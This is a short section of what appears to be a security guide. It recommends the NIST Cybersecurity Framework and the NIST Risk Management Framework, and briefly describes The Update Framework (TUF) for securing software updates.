NIST Security framework#
Whenever you feel the need to draw a process regarding security or risk processes: resist the temptation! The US based NIST organization is a well-known governmental organization that offers great publications on all thinkable subjects regarding security.
One of the simplest, yet most frequently model is displayed here below.
On the NIST site (see references) you can find in-depth information regarding all sub functions of this security framework. The experience is, is that it is far better to check what in your use case needs special attention. If you ever feel the need to create your own security framework, think again. In essence all come down to the high level framework described by the NIST organization. Using a broad used security framework has a number of advantages:
Easier communication with stakeholders;
Easier knowledge and experience transfer between security experts of different organization;
Saves time, time you can use to solve the real context specific issues regarding practice use and implementation of the security functions.
NIST Risk Management Framework RMF#
The NIST Risk Management Framework (RMF) provides a comprehensive, flexible, repeatable, and measurable 7-step process that any organization can use to manage information security and privacy risk for organizations and systems and links to a suite of NIST standards and guidelines to support implementation of risk management programs to meet the requirements of the Federal Information Security Modernization Act (FISMA).
Risk management overview:
Search for RMF controls (checklist):
Good overview on of all controls:
The Update Framework#
The Update Framework (TUF) helps developers maintain the security of software update systems, providing protection even against attackers that compromise the repository or signing keys. TUF provides a flexible framework and specification that developers can adopt into any software update system.
TUF is hosted by the Linux Foundation as part of the Cloud Native Computing Foundation (CNCF) and is used in production by various tech companies and open source organizations.
This project is a Linux Foundation project under the Cloud Native Computing Foundation.